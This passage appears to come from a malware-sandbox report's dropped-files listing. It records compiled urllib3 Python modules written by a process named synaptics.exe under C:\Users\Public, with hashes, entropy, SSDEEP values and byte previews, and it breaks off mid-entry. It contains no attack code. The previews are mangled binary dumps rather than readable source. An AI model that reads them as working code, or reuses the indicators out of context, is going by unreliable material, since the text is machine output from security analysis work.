                                                                                                                                                                                                                                  SHA1:C00A4803C1C300AB8B21D4BE87CFD5445563CBC0
                                                                                                                                                                                                                                  SHA-256:285C8C778DD2DDF5F07555CCF6A4CC08F2050917C07DA94945DB72F59F59A8DC
                                                                                                                                                                                                                                  SHA-512:6F128A16A860E3B5FAFE1CD30D1C003B65D6393F9D095C97B59FE09F6923FC8F2CF4959C25A349F5C3500679B245C0F07448B35A7B0C3FDA81E78E56E819604B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.&.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.g.Z.e.j.e.j.e.j.e.e.j.e.e.f...f.....e.j.e.e.j.e.e.f...f...f...Z.G.d.d...d...Z.d.S.)......)...annotationsN)...urlencode.....)..._TYPE_BODY)...HTTPHeaderDict)..._TYPE_FIELDS..encode_multipart_formdata)...BaseHTTPResponse..RequestMethodsc....................@...sp...e.Z.d.Z.d.Z.h.d...Z.d%d&d.d...Z.........d'd(d.d...Z.........d)d*d.d...Z.....d+d,d!d"..Z.........d'd-d#d$..Z.d.S.).r....a..... Convenience mixin for classes who implement a :meth:`urlopen` method, such. as :class:`urllib3.HTTPConnectionPool` and. :class:`urllib3.PoolManager`... Provides behavior for making common types of HTTP request methods and. decides which type of request field encoding to use... Specifically,.. :meth:`.request_encode_url` is for sending requests whose fields are. encoded in the URL (such as GET, HEAD, DELETE)... :meth:`.request_encode_body`
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):480
                                                                                                                                                                                                                                  Entropy (8bit):5.366450835666649
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:y/CvlYN5ltyLSbBjz/8Ck4w3u5r3PyNAQ9AFtHzFAGhRvsx2c6m87lE/2f+uaHK6:CuKjR85Yr3auej47+uzniZ8I4srEkJ
                                                                                                                                                                                                                                  MD5:8EEE30E1172012408DFB5C0637A75D2D
                                                                                                                                                                                                                                  SHA1:A96F929A768D4945A269C2032041194596D562D9
                                                                                                                                                                                                                                  SHA-256:DB19FECEE775D86D450499B1418D8198D4A42BA6FE9F80489A27A54CE11AD8DD
                                                                                                                                                                                                                                  SHA-512:563E004F6D4CC006ECB66E6AB9C71C4E71FA870D95AB207DB6458AF1DE7F84DE0F198B4DAFA2C8DCE1F41E77A6900CAA4BA25D3C164DB466B9CA8F9D29122013
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.........................@...sh...U.d.Z.e.r.d.d.l.m.Z.m.Z...e.e.e.e.f...d.f...Z.n.e.Z.e.e.d.<.e.e.d.<.e.e.d.<.e.e.d.<.d...Z.Z.d...Z.Z.d.S.).F.....)...Tuple..Union...version..__version__..__version_tuple__..version_tuplez.2.2.3)......r.........N)...TYPE_CHECKING..typingr....r......int..strZ.VERSION_TUPLE..object..__annotations__r....r....r....r......r....r.....@C:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\_version.py..<module>....s..........................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24009
                                                                                                                                                                                                                                  Entropy (8bit):5.540549002359107
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:j3oyv1iEkiRj91RsJ0YTnenrRaBVIT7sgTbzXugzTBDERk4VypKsFVc56AnzeuqG:j3owrjRsJ0YTG6I8gniiJqYpn6QesG
                                                                                                                                                                                                                                  MD5:E69AE0BEE62F0F187BBDD3C88E780510
                                                                                                                                                                                                                                  SHA1:84C29FDE97170617EEBF31B5E622AF3C81578497
                                                                                                                                                                                                                                  SHA-256:8031817481555660194F71E6D5B9320BDAB79B005AA267C1331AC52DB5CA95B8
                                                                                                                                                                                                                                  SHA-512:DBB35D52016A14861AA6D7AADF0388C19587BB534E8714DF2D0BBB6E48A39C9645575A8827E6217DD32DEF64310C5FCC1FF9972BA8DF10DF70FA9EE05BB17E21
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..fT........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r[d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..z.d.d.l)Z)e)j*Z+W.n...e,e-f.y.......d.Z)G.d.d...d.e...Z+Y.n.w.d.d.l/m0Z0..d.d.l/m1Z1..d.d.l/m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>m?Z?m@Z@..d.d.lAmBZB..d.d.l.mCZD..d.d.l.mEZEmFZFmGZGmHZHmIZI..d.d.lJmKZKmLZL..d.d.lMmNZN..eOZOePZPe..QeR..ZSd.d.d ..ZTe..Ud!d"d...ZVe..Wd#..ZXeYe.d$..ZZG.d%d&..d&e...Z.G.d'd(..d(e...Z[G.d)d*..d*e.j\..Z]d+d,..d_dFdG..Z^.+d`dadNdO..Z_dbdTdU..Z`dcdVdW..ZaG.dXdY..dY..Zbe)..s[ebZ[e[Zc..ddded]d^..Zdd.S.)f.....)...annotationsN)...HTTPConnection)...HTTPException)...ResponseNotReady....timeout.........HTTPResponse)..._TYPE_PEER_CERT_RET_DICT)...SSLTransport)...HTTPHeaderDict)...probe)...assert_header_parsing)..._DEFAULT_TIMEOUT.._TYPE_TIME
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29197
                                                                                                                                                                                                                                  Entropy (8bit):5.4403174158724825
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:mi2l13Jti2pYtq6fBiKrzYIpKneR4TliLX1XkFCDD2rz8vIkwjYHklf8HvpnykHN:VaQ22tqUBi9eOTlfavNyke9aR
                                                                                                                                                                                                                                  MD5:D77AD1F00B6C64BA035E3CCC77669ABA
                                                                                                                                                                                                                                  SHA1:93B4CBB8D2A0860F82B8433C59D02B5D98A13024
                                                                                                                                                                                                                                  SHA-256:658676F96B14499148B4EC7AD348DB01BC90BF6F9A532A70FF97F9CF4CA4B695
                                                                                                                                                                                                                                  SHA-512:D73C75947587CEB1048FB0BE81E28B06C6AA5F53E5A5CA5B3A86D5ECA238B5C83B6A753F71C64522B4AB87002916F6EFF9AD7ACE69A92A7341C70365AD886F7C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.........................@...sV...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+..d.d.l,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<..d.d.l=m>Z>m?Z?..d.d.l=m@ZA..d.d.l=mBZB..d.d.lCmDZD..e.jEr.d.d.lFZFd.d.lGmHZH..d.d.l.mIZImJZJ..e..KeL..ZMe.jNe<eOe;d.f...ZPG.d.d...d...ZQe.jRe.jSh.ZTG.d.d...d.eQe...ZUG.d.d...d.eU..ZVd6d$d%..ZWe.jXd7d*d+....Z@e.jXd8d,d+....Z@d9d-d+..Z@..d:d;d1d2..ZYd<d4d5..ZZd.S.)=.....)...annotationsN....timeout)...TracebackType.....)..._TYPE_BODY)...HTTPHeaderDict)...RequestMethods)...BaseSSLError..BrokenPipeError..DummyConnection..HTTPConnection..HTTPException..HTTPSConnection..ProxyConfig.._wrap_proxy_error)...port_by_scheme)...ClosedPoolError..EmptyPoolError..FullPoolError..HostChangedError..InsecureRequestWarning..Location
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13220
                                                                                                                                                                                                                                  Entropy (8bit):4.953643436634498
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:sNvd2MCSNJR3aibXrLh86mCrEl7mRkUfLL2xEZiru/cc8fditjgsS5ioCR:sxdfCSNJR3aibXrLh86frElCRvTCuUrM
                                                                                                                                                                                                                                  MD5:5A4798C9B89C1993049B94513F6066EA
                                                                                                                                                                                                                                  SHA1:45FF51D9431EB0BBA9EF635F27DF53409FB2EF07
                                                                                                                                                                                                                                  SHA-256:67301FB68B04C04F249CAC62A49FC3A4AE007400424E0ECA291A1C0377186CA4
                                                                                                                                                                                                                                  SHA-512:111E66BDB1F50336F58B0FAC53CCD66AEB254F6D6867141175CBE0C8AC628F7AA4DDE0BD5A28F6AB739E9470CDE75963ED5F3D2D6741D10827C139F40176067F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.$.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.r9d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.e.j.e.j.d.e.f...e.j.e.d.f...f...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z e Z!G.d.d...d.e...Z"G.d.d...d.e...Z#G.d.d ..d e...Z$G.d!d"..d"e...Z%G.d#d$..d$e%e...Z&G.d%d&..d&e%..Z'G.d'd(..d(e'e...Z(G.d)d*..d*e(..Z)G.d+d,..d,e...Z*G.d-d...d.e...Z+G.d/d0..d0e...Z,G.d1d2..d2e-e...Z.G.d3d4..d4e...Z/G.d5d6..d6e...Z0G.d7d8..d8e...Z1G.d9d:..d:e...Z2G.d;d<..d<e2..Z3G.d=d>..d>e2..Z4G.d?d@..d@e2..Z5G.dAdB..dBe2..Z6G.dCdD..dDe...Z7G.dEdF..dFe e-..Z8G.dGdH..dHe...Z9G.dIdJ..dJe.e...Z.G.dKdL..dLe.e...Z:G.dMdN..dNe...Z;G.dOdP..dPe<e0..Z=G.dQdR..dRe-..Z>G.dSdT..dTe...Z?G.dUdV..dVe...Z@d.S.)W.....)...annotationsN)...MessageDefect)...IncompleteRead.....)...HTTPConnection)...ConnectionPool)...HTTPResponse)...Retryc....................@........e.Z.d.Z.d.Z.d.S.)...HT
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9702
                                                                                                                                                                                                                                  Entropy (8bit):5.401990130217446
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:toIkPHKu22d82vhf5Ev375rL9FYAKHK0oi7:tBkPHKu22Cehf+vL5rL9FYAKHboi7
                                                                                                                                                                                                                                  MD5:D92C1ADDCA12A7F8F882F035D553D8A1
                                                                                                                                                                                                                                  SHA1:016367D0529AE23BBA3697F7380B6E2ED979FD3E
                                                                                                                                                                                                                                  SHA-256:A38BAA28416779F7DC1F6A85355C0F8E70B070886FB190D507CCECC5A917E2A1
                                                                                                                                                                                                                                  SHA-512:8139422EBC803A069B805DC7DD0D6FECE2DAC8CE77FE64DAB17D725B782AFF28F96EB6C50FE116DF270FBF59A0C4DDC53B56C50AA150DB3D25665632152F1C9C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f[*.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.e.e.f...Z.e.j.e.e.j.e.e.f...e.j.e.e.e.f...f...Z...d.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.G.d.d...d...Z.d.S.)......)...annotationsN..application/octet-stream..filename..str | None..default..str..returnc....................C...s....|.r.t...|...d...p.|.S.|.S.).z.. Guess the "Content-Type" of a file... :param filename:. The filename to guess the "Content-Type" of using :mod:`mimetypes`.. :param default:. If no "Content-Type" can be guessed, default to `default`.. r....)...mimetypesZ.guess_type).r....r......r.....>C:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\fields.py..guess_content_type....s..........r......name..value.._TYPE_FIELD_VALUEc........................s....d.d.l.}.|.j.d.t.d.d.....t...t...r.....d.....t...f.d.d...d.D.....s=|...d.....d...}.z.|...d.....W.|.S...t.t.f.y<......Y.n.w.t.j.....d.....|...d...........S.).a..... Helper function to format and
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                                  Entropy (8bit):5.594938067237134
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:hL1hfLSMUUyrfcuCKwlb9BEA2GS8FD5yHbVz:tLSrxc59TEA2CDUHbx
                                                                                                                                                                                                                                  MD5:159895200097B65344A98089E2D136AA
                                                                                                                                                                                                                                  SHA1:EB3916FD4C3E98C3AE54D117B97B41884A818707
                                                                                                                                                                                                                                  SHA-256:3E8CF9DA25FC1AF33649CFAB04DE73EDA5C512E4325357A64093F2AF242E3409
                                                                                                                                                                                                                                  SHA-512:FC05E5F79CC64FED0562715E16112B2B10B65A86B020E9C0767867D223CE20EE493027DDA929A868DBD065AAAD5D18EABC27CD923F427E72179848BFA3DE82BC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f[........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e...d...d...Z.e.j.e.j.e.j.e.e.f...e.f.....Z.e.j.e.e.j.e.e.f...f...Z.d.d.d...Z.d.d.d...Z...d.d.d.d...Z.d.S.)......)...annotationsN)...BytesIO.....)..._TYPE_FIELD_VALUE_TUPLE..RequestFieldz.utf-8.......return..strc....................C...s....t...t...d.........S.).zN. Our embarrassingly-simple replacement for mimetools.choose_boundary.. .....)...binascii..hexlify..os..urandom..decode..r....r.....@C:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\filepost.py..choose_boundary....s......r......fields.._TYPE_FIELDS..typing.Iterable[RequestField]c....................c...sH.....t.|.t.j...r.|.....}.n.|.}.|.D.].}.t.|.t...r.|.V...q.t.j.|...V...q.d.S.).z.. Iterate over fields... Supports list of (k, v) tuples and dicts, and lists of. :class:`~urllib3.fields.RequestField`... N)...isinstance..typing..Mapping..itemsr....Z.from_tuples).r......iterable..fieldr....r.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18188
                                                                                                                                                                                                                                  Entropy (8bit):5.4911700702495585
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:+rlCIl5+Q3vw7bm2+Pp0hTZp4tGwimHF3Y:OvgQ3vwng+NZp8Bl3Y
                                                                                                                                                                                                                                  MD5:713B2FE1C46043CCAE2C6B53F42DA80B
                                                                                                                                                                                                                                  SHA1:C99FEBA86550292F42D9DE7B0B62AF5D008EBBF5
                                                                                                                                                                                                                                  SHA-256:411B026768C22A3F31F4B28DDFB936106512E9562CB6BC884C05FAA17E19FB95
                                                                                                                                                                                                                                  SHA-512:18A45DF43B9D20709C8CB0C001D49824931E42EF6223693A64BF71E8DFAB0E766CDE1ED6BBABDE5EA5A0B6281A05E6956777F28059099B2000BC6FCB9563C07D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.Y.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..e.j'r.d.d.l(Z(d.d.l)m*Z*..g.d...Z+e..,e-..Z.d.Z/d.Z0G.d.d...d.e.j1..Z2d)d.d...Z3e..4e3e2..e..4e3e2..d...Z5e.e.d...Z6G.d.d ..d e...Z7G.d!d"..d"e7..Z8d*d'd(..Z9d.S.)+.....)...annotationsN)...TracebackType)...urljoin.....)...HTTPHeaderDict..RecentlyUsedContainer)...RequestMethods)...ProxyConfig)...HTTPConnectionPool..HTTPSConnectionPool..port_by_scheme)...LocationValueError..MaxRetryError..ProxySchemeUnknown..URLSchemeUnknown)...BaseHTTPResponse)..._TYPE_SOCKET_OPTIONS)...connection_requires_http_tunnel)...Retry)...Timeout)...Url..parse_url)...Self)...PoolManager..ProxyManager..proxy_from_url)...key_file..cert_file..cert_reqs..ca_certs..ca_cert_data..ssl_version..ssl_minimum_version..ssl_maximum_version..ca_cert_dir..ss
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33450
                                                                                                                                                                                                                                  Entropy (8bit):5.334645759683884
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:OnBkshRIwAG560Mg+c3lKBgtd1xaZ38CSYJr/YV4CypM0AmwK2Kd1B+E1dz6RPrX:DGc8L1KBaPxbupCIAHK2KZiy8wUhX
                                                                                                                                                                                                                                  MD5:643ECE4467BEB4D4B17878F2C9B3207C
                                                                                                                                                                                                                                  SHA1:FB4DC920883C106F6CE3D291A2DD033C2970DF6C
                                                                                                                                                                                                                                  SHA-256:A050ED07CA8216AB651E2CDEDC83FE997F7C249650593B252874355FCE8DF675
                                                                                                                                                                                                                                  SHA-512:7F4D99051A8FC2FF9B7DB9E21D5FFF84CE8DFF5A71752E249D89910A1C43DDB72058E5A643581CDEAF8B9E04666BE0B334729861B7E989EE16F06B34C3D3EFDF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.rKd.d.l.m.Z...z.z.d.d.l.Z.W.n...e.y_......d.d.l.Z.Y.n.w.W.n...e.yl......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.e.e.f.y.......d.Z Y.n.w.e!e"e#e..$d.e.j%...&......Z'e'd.k.r.d.Z n.d.Z d.d.l(m)Z)..d.d.l.m*Z*..d.d.l+m,Z,..d.d.l-m.Z.m/Z/m0Z0..d.d.l1m2Z2m3Z3m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>..d.d.l?m@Z@..e.j.r.d.d.lAmBZB..e..CeD..ZEG.d.d...d...ZFG.d.d...d.eF..ZGG.d.d...d...ZHG.d.d...d.eF..ZIe.d.u...r.G.d.d...d.eF..ZJe ..r.G.d.d ..d eF..ZKG.d!d"..d"eF..ZLd.d&d'..ZMG.d(d)..d)..ZNG.d*d+..d+e.jO..ZPG.d,d-..d-eP..Z.d.S.)/.....)...annotationsN)...contextmanager)...HTTPMessage)...HTTPResponse)...timeout.....)...BaseHTTPConnectionFz.^([0-9]+)\.([0-9]+)).r.........T)...util)..._TYPE_BODY)...HTTPHeaderDict)...BaseSSLError..HTTPConnection..HTTPException)...BodyNotHttplibCompatible..DecodeError..HTTPError..IncompleteRead..
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):165
                                                                                                                                                                                                                                  Entropy (8bit):4.55427522760354
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:y/C8llGllluleh/wZWet5OaHF5oXu5E5DVWrzOXH+IOkcTgp:y/C8lcl/qeh/whIaHKdAr6XeR4
                                                                                                                                                                                                                                  MD5:AD7689A7AA96703BAAA63637D9526625
                                                                                                                                                                                                                                  SHA1:9E4AE068A29B0213DF7A3CAEE73CCDFD4B877C4A
                                                                                                                                                                                                                                  SHA-256:E4F505BF76CB628E532CBE2BFAC533CC7959712DD9EAB249A936E5C5ADB398CF
                                                                                                                                                                                                                                  SHA-512:5D15A862C3B2E1D14B815101FC67E4B0EEBD6D22616FF7938E9FB06611CF3CB8AE77C1511619FBA13AAC0E68A5AC2AC4864A7B9596A507DF5B4270BF2BE8CAE3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.........................@...s....d.S.).N..r....r....r.....HC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\contrib\__init__.py..<module>....s......
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6126
                                                                                                                                                                                                                                  Entropy (8bit):5.637119256134298
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:7q8bFojUEqiHSz8wKWZMs7hTbWiTmC69iE245Zi81JQ3:W6VEqtMGbC9ipca3
                                                                                                                                                                                                                                  MD5:0DED9A7C5F037BA15A9FBCD1C1F9EB34
                                                                                                                                                                                                                                  SHA1:C803F157BD4D15F5C1FD23F5EA2FE12BC0B86480
                                                                                                                                                                                                                                  SHA-256:45E680BCF63B07E6BEEDF03BED483C704242F9EE7C38BFEE425BA7C973852658
                                                                                                                                                                                                                                  SHA-512:A413D897478E835A30D1A7ABFC3FA40F60B407FBC467561051102C42D9CF2FF511C1E0AE667EC9BA4E145D76F8714D0EAD2E9B2C5191102CC2A997DEC396DFB6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f}........................@...s6...d.Z.d.d.l.m.Z...z.d.d.l.Z.W.n...e.y&......d.d.l.Z.d.d.l.m.Z...e...d.e.......w.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.Z.W.n...e.yf......d.Z.Y.n.w.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z d.S.).a.....This module contains provisional support for SOCKS proxies from within.urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and.SOCKS5. To enable its functionality, either install PySocks or install this.module with the ``socks`` extra...The SOCKS implementation supports the full range of urllib3 features. It also.supports the following SOCKS features:..- SOCKS4A (``proxy_url='socks4a://...``).- SOCKS4 (``proxy_url='socks4://...``).- SOCKS5 with remote DNS (``proxy_url='socks5h://...``).- SOCKS5 with local DNS (``proxy_url='socks5://...``).- Usernames and passwords for the SOCKS proxy.... note::. It is recom
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1402
                                                                                                                                                                                                                                  Entropy (8bit):5.396954782931843
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:LMu6QKYYYH7N9QU4DMU3KZsGfM3yRiR7FynW92vbwFWHrb49msQWP7:ABdYLbX4DinRayzD9Hrb4mAP7
                                                                                                                                                                                                                                  MD5:A89A83D4C6249249683B57E13B46511F
                                                                                                                                                                                                                                  SHA1:1C5EE83A8C001C02D625A589448C0E7A1C0ECDAA
                                                                                                                                                                                                                                  SHA-256:055C794082ACD8D194F043C0876B7C4D03AE0A332E2EA5465BE9C9592D528B01
                                                                                                                                                                                                                                  SHA-512:13302D3E96910D8FCAAA17537C2B43F9D08A70356FB0DA202454569215CE8B41907ADA34E1CA49D21AD937B6A26EB942E3A77A14C3E5FC8E1C9BCC03BEBBDE5D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.........................@...sN...U.d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.d.d.l.Z.d.a.d.e.d.<.d.d.d...Z.d.d.d...Z.d.S.)......)...annotations)...version..inject_into_urllib3..extract_from_urllib3Nz.typing.Any..orig_HTTPSConnection..return..Nonec....................C...s....t.d...}.|...d...s.t.d.|...d.......d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...|.j.a.|.|._.|.|._.d.g.|._.d.g.|._.d.S.).N..h2z.4.zQurllib3 v2 supports h2 version 4.x.x, currently the 'h2' module is compiled with z5. See: https://github.com/urllib3/urllib3/issues/3290.........connection....util....HTTPSConnectionPool....ssl_.....)...HTTP2Connection).r......startswith..ImportError..r....r......connectionpoolr....r....r......HTTPSConnectionr......ConnectionCls..ALPN_PROTOCOLS).Z.h2_version..urllib3_connection..urllib3_utilr......urllib3_util_sslr......r.....FC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\http2\__init__.pyr........s".....................................c....................C...sP
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2536
                                                                                                                                                                                                                                  Entropy (8bit):5.257063032313745
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:kPQG3rPc+qRTB08DGmDZrZCYawGQ2bcwf27jpWsI663cv6iuJh6+:kzK/DGmDZEYaw4bbujpXkSNok+
                                                                                                                                                                                                                                  MD5:9FFC6A70A7F7A4330339DA37A36DEB94
                                                                                                                                                                                                                                  SHA1:D4432234CB9C2E641541B995CDB3F400DE27AEF4
                                                                                                                                                                                                                                  SHA-256:5D7F726F1F0D238C9486EB16C39D984B7BED243DCE8B316B58B777545B27569C
                                                                                                                                                                                                                                  SHA-512:4BEF2B3F598CDEEC47535D68A4A636BE8E294E1777EE4D30EBCF6D7BCFBFDBDC66451677BA1AB65409E4D8F5A85F2BDC4A91B30E58A3D39E4C84103B713B6366
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.........................@...sL...d.d.l.m.Z...d.d.l.Z.G.d.d...d...Z.e...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.d.d.g.Z.d.S.)......)...annotationsNc....................@...sB...e.Z.d.Z.d.Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)..._HTTP2ProbeCache...._lock.._cache_locks.._cache_values..return..Nonec....................C...s....t.....|._.i.|._.i.|._.d.S...N)...threading..Lockr....r....r........self..r.....CC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\http2\probe.py..__init__....s..........z._HTTP2ProbeCache.__init__..host..str..port..int..bool | Nonec....................C...s....d.}.|.j..7..|.|.f.}.z.|.j.|...}.|.d.u.r.|.W.W...d.........S.W.n...t.y4......t.....|.j.|.<.d.|.j.|.<.Y.n.w.W.d.........n.1.s?w.......Y...|.j.|...}.|.......z.|.j.|...}.W.|.S...t.ym..}...z.t.|.t...rdJ...|.........d.}.~.w.w.r....).r....r......KeyErrorr......RLockr......acquire..BaseException..isinstance..release).r....r....r......value..key..key_lock..er....r....r......acquire_and_get....s4....
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):945
                                                                                                                                                                                                                                  Entropy (8bit):5.335058512081807
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:cIJUVegJzYoyYhRYQZyihmLptrv2buqq9PXgnL:H3gJz2Y39Zyi0TrOaqq9PQL
                                                                                                                                                                                                                                  MD5:C41FEF6B783E8EECE0198617E74A6AE2
